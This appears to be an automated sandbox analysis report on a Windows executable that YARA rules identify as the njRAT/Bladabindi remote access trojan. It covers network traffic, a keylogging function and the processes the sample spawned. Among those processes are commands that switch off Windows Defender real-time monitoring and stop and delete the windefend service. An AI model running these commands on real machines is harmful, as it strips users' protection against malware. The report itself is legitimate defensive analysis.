Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs .Net Code: VKCodeToUnicode

E-Banking Fraud
barindex
Yara detected Njrat
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E000A 0_2_00007FFD9B8E000A
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E0501 0_2_00007FFD9B8E0501
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E2354 0_2_00007FFD9B8E2354
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E1EDA 0_2_00007FFD9B8E1EDA
Uses 32bit PE files
Source: G1lnGpOLK4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: G1lnGpOLK4.exe Static PE information: Section: .reloc ZLIB complexity 0.99609375
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@37/7@13/6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Mutant created: \Sessions\1\BaseNamedObjects\f2d4732908d59805d830a49d36974ac0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojnmq5j.r54.ps1 Jump to behavior
Source: G1lnGpOLK4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: G1lnGpOLK4.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: G1lnGpOLK4.exe ReversingLabs: Detection: 68%
Source: G1lnGpOLK4.exe Virustotal: Detection: 70%
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe File read: C:\Users\user\Desktop\G1lnGpOLK4.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\G1lnGpOLK4.exe "C:\Users\user\Desktop\G1lnGpOLK4.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc query windefend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc delete windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc query windefend Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process created: C:\Windows\System32\cmd.exe cmd /c sc delete windefend Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query windefend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop windefend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete windefend Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: version.dll Jump to behavior
